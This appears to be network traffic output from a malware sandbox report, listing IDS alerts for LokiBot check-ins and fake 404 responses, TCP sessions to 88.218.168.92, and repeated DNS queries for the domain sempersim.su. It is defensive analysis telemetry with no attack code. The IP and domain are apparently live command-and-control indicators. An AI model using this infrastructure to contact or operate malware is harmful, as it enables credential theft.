                  05/04/22-17:05:52.472200 05/04/22-17:05:52.472200TCP2025483ET TROJAN LokiBot Fake 404 Response804976288.218.168.92192.168.2.4
                  05/04/22-17:07:06.131413 05/04/22-17:07:06.131413UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5514253192.168.2.48.8.8.8
                  05/04/22-17:07:12.890174 05/04/22-17:07:12.890174TCP2025483ET TROJAN LokiBot Fake 404 Response804980988.218.168.92192.168.2.4
                  05/04/22-17:07:36.607784 05/04/22-17:07:36.607784TCP2025483ET TROJAN LokiBot Fake 404 Response804982088.218.168.92192.168.2.4
                  05/04/22-17:06:13.256202 05/04/22-17:06:13.256202UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6136153192.168.2.48.8.8.8
                  05/04/22-17:06:36.219078 05/04/22-17:06:36.219078UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6343153192.168.2.48.8.8.8
                  05/04/22-17:07:34.907867 05/04/22-17:07:34.907867UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6270853192.168.2.48.8.8.8
                  05/04/22-17:06:34.736743 05/04/22-17:06:34.736743TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.488.218.168.92
                  05/04/22-17:07:26.831839 05/04/22-17:07:26.831839TCP2025483ET TROJAN LokiBot Fake 404 Response804981588.218.168.92192.168.2.4
                  05/04/22-17:07:20.640279 05/04/22-17:07:20.640279TCP2825766ETPRO TROJAN LokiBot Checkin M24981380192.168.2.488.218.168.92
                  05/04/22-17:06:27.214704 05/04/22-17:06:27.214704UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6061253192.168.2.48.8.8.8
                  05/04/22-17:06:38.226151 05/04/22-17:06:38.226151UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5690153192.168.2.48.8.8.8
                  05/04/22-17:07:33.087141 05/04/22-17:07:33.087141TCP2025483ET TROJAN LokiBot Fake 404 Response804981888.218.168.92192.168.2.4
                  05/04/22-17:05:59.063198 05/04/22-17:05:59.063198TCP2025483ET TROJAN LokiBot Fake 404 Response804976788.218.168.92192.168.2.4
                  05/04/22-17:06:20.073584 05/04/22-17:06:20.073584TCP2025483ET TROJAN LokiBot Fake 404 Response804978288.218.168.92192.168.2.4
                  05/04/22-17:06:54.199564 05/04/22-17:06:54.199564TCP2825766ETPRO TROJAN LokiBot Checkin M24979880192.168.2.488.218.168.92
                  05/04/22-17:07:29.679426 05/04/22-17:07:29.679426TCP2025483ET TROJAN LokiBot Fake 404 Response804981688.218.168.92192.168.2.4
                  05/04/22-17:07:12.448957 05/04/22-17:07:12.448957TCP2825766ETPRO TROJAN LokiBot Checkin M24980980192.168.2.488.218.168.92
                  05/04/22-17:07:00.180937 05/04/22-17:07:00.180937TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.488.218.168.92
                  05/04/22-17:07:00.131351 05/04/22-17:07:00.131351UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6149753192.168.2.48.8.8.8
                  05/04/22-17:06:13.307202 05/04/22-17:06:13.307202TCP2825766ETPRO TROJAN LokiBot Checkin M24977980192.168.2.488.218.168.92
                  05/04/22-17:05:50.113938 05/04/22-17:05:50.113938UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6427753192.168.2.48.8.8.8
                  05/04/22-17:07:04.517653 05/04/22-17:07:04.517653UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5789053192.168.2.48.8.8.8
                  05/04/22-17:06:32.814891 05/04/22-17:06:32.814891UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6482553192.168.2.48.8.8.8
                  05/04/22-17:07:12.396863 05/04/22-17:07:12.396863UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6041853192.168.2.48.8.8.8
                  05/04/22-17:06:47.985481 05/04/22-17:06:47.985481TCP2025483ET TROJAN LokiBot Fake 404 Response804979488.218.168.92192.168.2.4
                  05/04/22-17:06:11.039758 05/04/22-17:06:11.039758TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.488.218.168.92
                  05/04/22-17:06:31.242187 05/04/22-17:06:31.242187UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5643753192.168.2.48.8.8.8
                  05/04/22-17:07:06.643095 05/04/22-17:07:06.643095TCP2025483ET TROJAN LokiBot Fake 404 Response804980288.218.168.92192.168.2.4
                  05/04/22-17:06:27.338928 05/04/22-17:06:27.338928TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.488.218.168.92
                  05/04/22-17:05:50.684991 05/04/22-17:05:50.684991TCP2025483ET TROJAN LokiBot Fake 404 Response804976188.218.168.92192.168.2.4
                  05/04/22-17:06:33.611126 05/04/22-17:06:33.611126TCP2025483ET TROJAN LokiBot Fake 404 Response804978888.218.168.92192.168.2.4
                  05/04/22-17:06:21.093407 05/04/22-17:06:21.093407UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6235453192.168.2.48.8.8.8
                  05/04/22-17:06:40.145922 05/04/22-17:06:40.145922UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5080053192.168.2.48.8.8.8
                  05/04/22-17:06:09.141152 05/04/22-17:06:09.141152TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.488.218.168.92
                  05/04/22-17:07:36.164319 05/04/22-17:07:36.164319TCP2825766ETPRO TROJAN LokiBot Checkin M24982080192.168.2.488.218.168.92
                  05/04/22-17:07:08.526354 05/04/22-17:07:08.526354TCP2825766ETPRO TROJAN LokiBot Checkin M24980880192.168.2.488.218.168.92
                  05/04/22-17:07:24.388512 05/04/22-17:07:24.388512UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5781653192.168.2.48.8.8.8
                  05/04/22-17:06:01.382015 05/04/22-17:06:01.382015UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5650953192.168.2.48.8.8.8
                  05/04/22-17:05:54.312280 05/04/22-17:05:54.312280TCP2025483ET TROJAN LokiBot Fake 404 Response804976488.218.168.92192.168.2.4
                  05/04/22-17:06:15.931925 05/04/22-17:06:15.931925TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.488.218.168.92
                  05/04/22-17:07:15.184930 05/04/22-17:07:15.184930UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6425953192.168.2.48.8.8.8
                  05/04/22-17:06:57.664119 05/04/22-17:06:57.664119UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6148653192.168.2.48.8.8.8
                  05/04/22-17:06:33.132721 05/04/22-17:06:33.132721TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.488.218.168.92
                  05/04/22-17:07:29.203285 05/04/22-17:07:29.203285UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5391653192.168.2.48.8.8.8
                  05/04/22-17:06:57.725161 05/04/22-17:06:57.725161TCP2825766ETPRO TROJAN LokiBot Checkin M24979980192.168.2.488.218.168.92
                  05/04/22-17:05:42.799347 05/04/22-17:05:42.799347UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5480053192.168.2.48.8.8.8
                  05/04/22-17:06:54.742448 05/04/22-17:06:54.742448TCP2025483ET TROJAN LokiBot Fake 404 Response804979888.218.168.92192.168.2.4
                  05/04/22-17:06:21.151210 05/04/22-17:06:21.151210TCP2825766ETPRO TROJAN LokiBot Checkin M24978380192.168.2.488.218.168.92
                  05/04/22-17:06:51.121383 05/04/22-17:06:51.121383TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.488.218.168.92
                  05/04/22-17:06:36.270568 05/04/22-17:06:36.270568TCP2825766ETPRO TROJAN LokiBot Checkin M24979080192.168.2.488.218.168.92
                  05/04/22-17:06:35.234500 05/04/22-17:06:35.234500TCP2025483ET TROJAN LokiBot Fake 404 Response804978988.218.168.92192.168.2.4
                  05/04/22-17:06:47.499153 05/04/22-17:06:47.499153TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.488.218.168.92
                  05/04/22-17:05:55.553795 05/04/22-17:05:55.553795UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6064753192.168.2.48.8.8.8
                  05/04/22-17:06:01.435904 05/04/22-17:06:01.435904TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.488.218.168.92
                  05/04/22-17:06:29.101313 05/04/22-17:06:29.101313TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.488.218.168.92
                  05/04/22-17:06:18.108508 05/04/22-17:06:18.108508UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5167953192.168.2.48.8.8.8
                  05/04/22-17:07:35.421031 05/04/22-17:07:35.421031TCP2025483ET TROJAN LokiBot Fake 404 Response804981988.218.168.92192.168.2.4
                  05/04/22-17:05:51.787319 05/04/22-17:05:51.787319UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5607653192.168.2.48.8.8.8
                  05/04/22-17:06:03.992034 05/04/22-17:06:03.992034TCP2025483ET TROJAN LokiBot Fake 404 Response804977188.218.168.92192.168.2.4
                  05/04/22-17:07:09.009329 05/04/22-17:07:09.009329TCP2025483ET TROJAN LokiBot Fake 404 Response804980888.218.168.92192.168.2.4
                  05/04/22-17:06:22.836617 05/04/22-17:06:22.836617UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5006153192.168.2.48.8.8.8
                  05/04/22-17:06:38.732588 05/04/22-17:06:38.732588TCP2025483ET TROJAN LokiBot Fake 404 Response804979188.218.168.92192.168.2.4
                  05/04/22-17:06:40.593792 05/04/22-17:06:40.593792TCP2025483ET TROJAN LokiBot Fake 404 Response804979288.218.168.92192.168.2.4
                  05/04/22-17:06:45.966592 05/04/22-17:06:45.966592UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5225653192.168.2.48.8.8.8
                  05/04/22-17:06:50.800947 05/04/22-17:06:50.800947UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6371253192.168.2.48.8.8.8
                  05/04/22-17:05:46.100520 05/04/22-17:05:46.100520UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6445453192.168.2.48.8.8.8
                  TimestampSource PortDest PortSource IPDest IP
                  May 4, 2022 17:05:43.107356071 CEST4975880192.168.2.488.218.168.92
                  May 4, 2022 17:05:43.135206938 CEST804975888.218.168.92192.168.2.4
                  May 4, 2022 17:05:43.135324001 CEST4975880192.168.2.488.218.168.92
                  May 4, 2022 17:05:43.139332056 CEST4975880192.168.2.488.218.168.92
                  May 4, 2022 17:05:43.166277885 CEST804975888.218.168.92192.168.2.4
                  May 4, 2022 17:05:43.166413069 CEST4975880192.168.2.488.218.168.92
                  May 4, 2022 17:05:43.193197966 CEST804975888.218.168.92192.168.2.4
                  May 4, 2022 17:05:43.679094076 CEST804975888.218.168.92192.168.2.4
                  May 4, 2022 17:05:43.679269075 CEST4975880192.168.2.488.218.168.92
                  May 4, 2022 17:05:43.681265116 CEST4975880192.168.2.488.218.168.92
                  May 4, 2022 17:05:43.708215952 CEST804975888.218.168.92192.168.2.4
                  May 4, 2022 17:05:46.290865898 CEST4975980192.168.2.488.218.168.92
                  May 4, 2022 17:05:46.317907095 CEST804975988.218.168.92192.168.2.4
                  May 4, 2022 17:05:46.318145990 CEST4975980192.168.2.488.218.168.92
                  May 4, 2022 17:05:46.967262983 CEST4975980192.168.2.488.218.168.92
                  May 4, 2022 17:05:46.996504068 CEST804975988.218.168.92192.168.2.4
                  May 4, 2022 17:05:46.996737957 CEST4975980192.168.2.488.218.168.92
                  May 4, 2022 17:05:47.023848057 CEST804975988.218.168.92192.168.2.4
                  May 4, 2022 17:05:47.694180965 CEST804975988.218.168.92192.168.2.4
                  May 4, 2022 17:05:47.694360971 CEST4975980192.168.2.488.218.168.92
                  May 4, 2022 17:05:47.717003107 CEST4975980192.168.2.488.218.168.92
                  May 4, 2022 17:05:47.744468927 CEST804975988.218.168.92192.168.2.4
                  May 4, 2022 17:05:50.191690922 CEST4976180192.168.2.488.218.168.92
                  May 4, 2022 17:05:50.218523026 CEST804976188.218.168.92192.168.2.4
                  May 4, 2022 17:05:50.218703032 CEST4976180192.168.2.488.218.168.92
                  May 4, 2022 17:05:50.222184896 CEST4976180192.168.2.488.218.168.92
                  May 4, 2022 17:05:50.248764038 CEST804976188.218.168.92192.168.2.4
                  May 4, 2022 17:05:50.248879910 CEST4976180192.168.2.488.218.168.92
                  May 4, 2022 17:05:50.275520086 CEST804976188.218.168.92192.168.2.4
                  May 4, 2022 17:05:50.684990883 CEST804976188.218.168.92192.168.2.4
                  May 4, 2022 17:05:50.685149908 CEST4976180192.168.2.488.218.168.92
                  May 4, 2022 17:05:50.685218096 CEST4976180192.168.2.488.218.168.92
                  May 4, 2022 17:05:50.714595079 CEST804976188.218.168.92192.168.2.4
                  May 4, 2022 17:05:51.898881912 CEST4976280192.168.2.488.218.168.92
                  May 4, 2022 17:05:51.927212000 CEST804976288.218.168.92192.168.2.4
                  May 4, 2022 17:05:51.927419901 CEST4976280192.168.2.488.218.168.92
                  May 4, 2022 17:05:51.935858011 CEST4976280192.168.2.488.218.168.92
                  May 4, 2022 17:05:51.963226080 CEST804976288.218.168.92192.168.2.4
                  May 4, 2022 17:05:51.963324070 CEST4976280192.168.2.488.218.168.92
                  May 4, 2022 17:05:51.990365982 CEST804976288.218.168.92192.168.2.4
                  May 4, 2022 17:05:52.472199917 CEST804976288.218.168.92192.168.2.4
                  May 4, 2022 17:05:52.472383022 CEST4976280192.168.2.488.218.168.92
                  May 4, 2022 17:05:52.472863913 CEST4976280192.168.2.488.218.168.92
                  May 4, 2022 17:05:52.499671936 CEST804976288.218.168.92192.168.2.4
                  May 4, 2022 17:05:53.784216881 CEST4976480192.168.2.488.218.168.92
                  May 4, 2022 17:05:53.810920954 CEST804976488.218.168.92192.168.2.4
                  May 4, 2022 17:05:53.811038017 CEST4976480192.168.2.488.218.168.92
                  May 4, 2022 17:05:53.814872980 CEST4976480192.168.2.488.218.168.92
                  May 4, 2022 17:05:53.843272924 CEST804976488.218.168.92192.168.2.4
                  May 4, 2022 17:05:53.843362093 CEST4976480192.168.2.488.218.168.92
                  May 4, 2022 17:05:53.873492956 CEST804976488.218.168.92192.168.2.4
                  May 4, 2022 17:05:54.312279940 CEST804976488.218.168.92192.168.2.4
                  May 4, 2022 17:05:54.312387943 CEST4976480192.168.2.488.218.168.92
                  May 4, 2022 17:05:54.312465906 CEST4976480192.168.2.488.218.168.92
                  May 4, 2022 17:05:54.339440107 CEST804976488.218.168.92192.168.2.4
                  May 4, 2022 17:05:56.582315922 CEST4976580192.168.2.488.218.168.92
                  May 4, 2022 17:05:56.610655069 CEST804976588.218.168.92192.168.2.4
                  May 4, 2022 17:05:56.610877037 CEST4976580192.168.2.488.218.168.92
                  May 4, 2022 17:05:56.623177052 CEST4976580192.168.2.488.218.168.92
                  May 4, 2022 17:05:56.650547028 CEST804976588.218.168.92192.168.2.4
                  May 4, 2022 17:05:56.650676966 CEST4976580192.168.2.488.218.168.92
                  May 4, 2022 17:05:56.677556992 CEST804976588.218.168.92192.168.2.4
                  May 4, 2022 17:05:57.102046013 CEST804976588.218.168.92192.168.2.4
                  May 4, 2022 17:05:57.102140903 CEST4976580192.168.2.488.218.168.92
                  May 4, 2022 17:05:57.102181911 CEST4976580192.168.2.488.218.168.92
                  May 4, 2022 17:05:57.130877972 CEST804976588.218.168.92192.168.2.4
                  May 4, 2022 17:05:58.468138933 CEST4976780192.168.2.488.218.168.92
                  May 4, 2022 17:05:58.495294094 CEST804976788.218.168.92192.168.2.4
                  May 4, 2022 17:05:58.495503902 CEST4976780192.168.2.488.218.168.92
                  May 4, 2022 17:05:58.579153061 CEST4976780192.168.2.488.218.168.92
                  May 4, 2022 17:05:58.606280088 CEST804976788.218.168.92192.168.2.4
                  May 4, 2022 17:05:58.606503963 CEST4976780192.168.2.488.218.168.92
                  May 4, 2022 17:05:58.633599997 CEST804976788.218.168.92192.168.2.4
                  May 4, 2022 17:05:59.063198090 CEST804976788.218.168.92192.168.2.4
                  May 4, 2022 17:05:59.063340902 CEST4976780192.168.2.488.218.168.92
                  May 4, 2022 17:05:59.063400984 CEST4976780192.168.2.488.218.168.92
                  May 4, 2022 17:05:59.090226889 CEST804976788.218.168.92192.168.2.4
                  May 4, 2022 17:06:01.404460907 CEST4976980192.168.2.488.218.168.92
                  May 4, 2022 17:06:01.431648016 CEST804976988.218.168.92192.168.2.4
                  May 4, 2022 17:06:01.431814909 CEST4976980192.168.2.488.218.168.92
                  May 4, 2022 17:06:01.435904026 CEST4976980192.168.2.488.218.168.92
                  May 4, 2022 17:06:01.462898016 CEST804976988.218.168.92192.168.2.4
                  May 4, 2022 17:06:01.462996006 CEST4976980192.168.2.488.218.168.92
                  May 4, 2022 17:06:01.489851952 CEST804976988.218.168.92192.168.2.4
                  May 4, 2022 17:06:01.883214951 CEST804976988.218.168.92192.168.2.4
                  May 4, 2022 17:06:01.883327007 CEST4976980192.168.2.488.218.168.92
                  May 4, 2022 17:06:01.883389950 CEST4976980192.168.2.488.218.168.92
                  May 4, 2022 17:06:01.910387039 CEST804976988.218.168.92192.168.2.4
                  May 4, 2022 17:06:03.544411898 CEST4977180192.168.2.488.218.168.92
                  May 4, 2022 17:06:03.571821928 CEST804977188.218.168.92192.168.2.4
                  May 4, 2022 17:06:03.571943998 CEST4977180192.168.2.488.218.168.92
                  May 4, 2022 17:06:03.575680971 CEST4977180192.168.2.488.218.168.92
                  May 4, 2022 17:06:03.602577925 CEST804977188.218.168.92192.168.2.4
                  May 4, 2022 17:06:03.602721930 CEST4977180192.168.2.488.218.168.92
                  May 4, 2022 17:06:03.629604101 CEST804977188.218.168.92192.168.2.4
                  May 4, 2022 17:06:03.992033958 CEST804977188.218.168.92192.168.2.4
                  May 4, 2022 17:06:03.992160082 CEST4977180192.168.2.488.218.168.92
                  May 4, 2022 17:06:03.992193937 CEST4977180192.168.2.488.218.168.92
                  May 4, 2022 17:06:04.018841028 CEST804977188.218.168.92192.168.2.4
                  May 4, 2022 17:06:09.109447002 CEST4977780192.168.2.488.218.168.92
                  TimestampSource PortDest PortSource IPDest IP
                  May 4, 2022 17:05:42.799346924 CEST5480053192.168.2.48.8.8.8
                  May 4, 2022 17:05:43.086805105 CEST53548008.8.8.8192.168.2.4
                  May 4, 2022 17:05:46.100519896 CEST6445453192.168.2.48.8.8.8
                  May 4, 2022 17:05:46.213469028 CEST53644548.8.8.8192.168.2.4
                  May 4, 2022 17:05:50.113938093 CEST6427753192.168.2.48.8.8.8
                  May 4, 2022 17:05:50.132235050 CEST53642778.8.8.8192.168.2.4
                  May 4, 2022 17:05:51.787318945 CEST5607653192.168.2.48.8.8.8
                  May 4, 2022 17:05:51.897289038 CEST53560768.8.8.8192.168.2.4
                  May 4, 2022 17:05:53.764676094 CEST6075853192.168.2.48.8.8.8
                  May 4, 2022 17:05:53.782625914 CEST53607588.8.8.8192.168.2.4
                  May 4, 2022 17:05:55.553795099 CEST6064753192.168.2.48.8.8.8
                  May 4, 2022 17:05:56.551065922 CEST6064753192.168.2.48.8.8.8
                  May 4, 2022 17:05:56.569468975 CEST53606478.8.8.8192.168.2.4
                  May 4, 2022 17:05:56.663363934 CEST53606478.8.8.8192.168.2.4
                  May 4, 2022 17:05:58.351855040 CEST6490953192.168.2.48.8.8.8
                  May 4, 2022 17:05:58.368366957 CEST53649098.8.8.8192.168.2.4
                  May 4, 2022 17:06:01.382014990 CEST5650953192.168.2.48.8.8.8
                  May 4, 2022 17:06:01.400378942 CEST53565098.8.8.8192.168.2.4
                  May 4, 2022 17:06:03.517853975 CEST5406953192.168.2.48.8.8.8
                  May 4, 2022 17:06:03.534624100 CEST53540698.8.8.8192.168.2.4
                  May 4, 2022 17:06:09.089375019 CEST5759453192.168.2.48.8.8.8
                  May 4, 2022 17:06:09.107700109 CEST53575948.8.8.8192.168.2.4
                  May 4, 2022 17:06:10.670600891 CEST6051253192.168.2.48.8.8.8
                  May 4, 2022 17:06:11.001914024 CEST53605128.8.8.8192.168.2.4
                  May 4, 2022 17:06:13.256201982 CEST6136153192.168.2.48.8.8.8
                  May 4, 2022 17:06:13.274743080 CEST53613618.8.8.8192.168.2.4
                  May 4, 2022 17:06:15.851898909 CEST5044553192.168.2.48.8.8.8
                  May 4, 2022 17:06:15.868463039 CEST53504458.8.8.8192.168.2.4
                  May 4, 2022 17:06:18.108508110 CEST5167953192.168.2.48.8.8.8
                  May 4, 2022 17:06:18.127079010 CEST53516798.8.8.8192.168.2.4
                  May 4, 2022 17:06:19.530814886 CEST5247253192.168.2.48.8.8.8
                  May 4, 2022 17:06:19.549356937 CEST53524728.8.8.8192.168.2.4
                  May 4, 2022 17:06:21.093406916 CEST6235453192.168.2.48.8.8.8
                  May 4, 2022 17:06:21.109705925 CEST53623548.8.8.8192.168.2.4
                  May 4, 2022 17:06:22.836616993 CEST5006153192.168.2.48.8.8.8
                  May 4, 2022 17:06:22.855032921 CEST53500618.8.8.8192.168.2.4
                  May 4, 2022 17:06:27.214704037 CEST6061253192.168.2.48.8.8.8
                  May 4, 2022 17:06:27.231436968 CEST53606128.8.8.8192.168.2.4
                  May 4, 2022 17:06:29.050170898 CEST5881653192.168.2.48.8.8.8
                  May 4, 2022 17:06:29.068125963 CEST53588168.8.8.8192.168.2.4
                  May 4, 2022 17:06:31.242187023 CEST5643753192.168.2.48.8.8.8
                  May 4, 2022 17:06:31.260615110 CEST53564378.8.8.8192.168.2.4
                  May 4, 2022 17:06:32.814891100 CEST6482553192.168.2.48.8.8.8
                  May 4, 2022 17:06:33.099653959 CEST53648258.8.8.8192.168.2.4
                  May 4, 2022 17:06:34.682086945 CEST5398953192.168.2.48.8.8.8
                  May 4, 2022 17:06:34.700314999 CEST53539898.8.8.8192.168.2.4
                  May 4, 2022 17:06:36.219078064 CEST6343153192.168.2.48.8.8.8
                  May 4, 2022 17:06:36.238348961 CEST53634318.8.8.8192.168.2.4
                  May 4, 2022 17:06:38.226150990 CEST5690153192.168.2.48.8.8.8
                  May 4, 2022 17:06:38.244344950 CEST53569018.8.8.8192.168.2.4
                  May 4, 2022 17:06:40.145921946 CEST5080053192.168.2.48.8.8.8
                  May 4, 2022 17:06:40.164742947 CEST53508008.8.8.8192.168.2.4
                  May 4, 2022 17:06:45.966592073 CEST5225653192.168.2.48.8.8.8
                  May 4, 2022 17:06:45.984704018 CEST53522568.8.8.8192.168.2.4
                  May 4, 2022 17:06:47.446849108 CEST6108153192.168.2.48.8.8.8
                  May 4, 2022 17:06:47.466262102 CEST53610818.8.8.8192.168.2.4
                  May 4, 2022 17:06:50.800946951 CEST6371253192.168.2.48.8.8.8
                  May 4, 2022 17:06:51.087764978 CEST53637128.8.8.8192.168.2.4
                  May 4, 2022 17:06:54.136918068 CEST5077853192.168.2.48.8.8.8
                  May 4, 2022 17:06:54.155487061 CEST53507788.8.8.8192.168.2.4
                  May 4, 2022 17:06:57.664119005 CEST6148653192.168.2.48.8.8.8
                  May 4, 2022 17:06:57.683183908 CEST53614868.8.8.8192.168.2.4
                  May 4, 2022 17:07:00.131350994 CEST6149753192.168.2.48.8.8.8
                  May 4, 2022 17:07:00.149154902 CEST53614978.8.8.8192.168.2.4
                  May 4, 2022 17:07:04.517652988 CEST5789053192.168.2.48.8.8.8
                  May 4, 2022 17:07:04.536412001 CEST53578908.8.8.8192.168.2.4
                  May 4, 2022 17:07:06.131412983 CEST5514253192.168.2.48.8.8.8
                  May 4, 2022 17:07:06.148112059 CEST53551428.8.8.8192.168.2.4
                  May 4, 2022 17:07:08.472306013 CEST6494853192.168.2.48.8.8.8
                  May 4, 2022 17:07:08.490387917 CEST53649488.8.8.8192.168.2.4
                  May 4, 2022 17:07:12.396862984 CEST6041853192.168.2.48.8.8.8
                  May 4, 2022 17:07:12.413196087 CEST53604188.8.8.8192.168.2.4
                  May 4, 2022 17:07:15.184930086 CEST6425953192.168.2.48.8.8.8
                  May 4, 2022 17:07:15.203217030 CEST53642598.8.8.8192.168.2.4
                  May 4, 2022 17:07:18.109793901 CEST6106853192.168.2.48.8.8.8
                  May 4, 2022 17:07:18.128374100 CEST53610688.8.8.8192.168.2.4
                  May 4, 2022 17:07:20.576478004 CEST5871553192.168.2.48.8.8.8
                  May 4, 2022 17:07:20.593101025 CEST53587158.8.8.8192.168.2.4
                  May 4, 2022 17:07:24.388511896 CEST5781653192.168.2.48.8.8.8
                  May 4, 2022 17:07:24.405092955 CEST53578168.8.8.8192.168.2.4
                  May 4, 2022 17:07:26.375874043 CEST5178753192.168.2.48.8.8.8
                  May 4, 2022 17:07:26.394052982 CEST53517878.8.8.8192.168.2.4
                  May 4, 2022 17:07:29.203284979 CEST5391653192.168.2.48.8.8.8
                  May 4, 2022 17:07:29.221874952 CEST53539168.8.8.8192.168.2.4
                  May 4, 2022 17:07:32.534837961 CEST6079053192.168.2.48.8.8.8
                  May 4, 2022 17:07:32.551269054 CEST53607908.8.8.8192.168.2.4
                  May 4, 2022 17:07:34.907866955 CEST6270853192.168.2.48.8.8.8
                  May 4, 2022 17:07:34.926085949 CEST53627088.8.8.8192.168.2.4
                  May 4, 2022 17:07:36.027148962 CEST6094653192.168.2.48.8.8.8
                  May 4, 2022 17:07:36.133327961 CEST53609468.8.8.8192.168.2.4
                  TimestampSource IPDest IPChecksumCodeType
                  May 4, 2022 17:05:56.663474083 CEST192.168.2.48.8.8.8d000(Port unreachable)Destination Unreachable
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  May 4, 2022 17:05:42.799346924 CEST192.168.2.48.8.8.80xc6aeStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:46.100519896 CEST192.168.2.48.8.8.80xef5fStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:50.113938093 CEST192.168.2.48.8.8.80x6bfaStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:51.787318945 CEST192.168.2.48.8.8.80x9024Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:53.764676094 CEST192.168.2.48.8.8.80x9202Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:55.553795099 CEST192.168.2.48.8.8.80xc949Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:56.551065922 CEST192.168.2.48.8.8.80xc949Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:05:58.351855040 CEST192.168.2.48.8.8.80x19e4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:01.382014990 CEST192.168.2.48.8.8.80x20e9Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:03.517853975 CEST192.168.2.48.8.8.80x77c9Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:09.089375019 CEST192.168.2.48.8.8.80x40cStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:10.670600891 CEST192.168.2.48.8.8.80x6a5Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:13.256201982 CEST192.168.2.48.8.8.80x2059Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:15.851898909 CEST192.168.2.48.8.8.80xba1bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:18.108508110 CEST192.168.2.48.8.8.80xf9a1Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:19.530814886 CEST192.168.2.48.8.8.80x5dafStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:21.093406916 CEST192.168.2.48.8.8.80x230dStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:22.836616993 CEST192.168.2.48.8.8.80x1e5aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:27.214704037 CEST192.168.2.48.8.8.80xbc8aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:29.050170898 CEST192.168.2.48.8.8.80x8679Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:31.242187023 CEST192.168.2.48.8.8.80x34bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:32.814891100 CEST192.168.2.48.8.8.80x2cd0Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:34.682086945 CEST192.168.2.48.8.8.80xd7f4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:36.219078064 CEST192.168.2.48.8.8.80x88a6Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:38.226150990 CEST192.168.2.48.8.8.80xcb91Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:40.145921946 CEST192.168.2.48.8.8.80x8a6fStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:45.966592073 CEST192.168.2.48.8.8.80x6a3bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:47.446849108 CEST192.168.2.48.8.8.80x9757Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:50.800946951 CEST192.168.2.48.8.8.80xa712Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:06:54.136918068 CEST192.168.2.48.8.8.80x63e7Standard query (0)sempersim.suA (IP address)IN (0x0001)
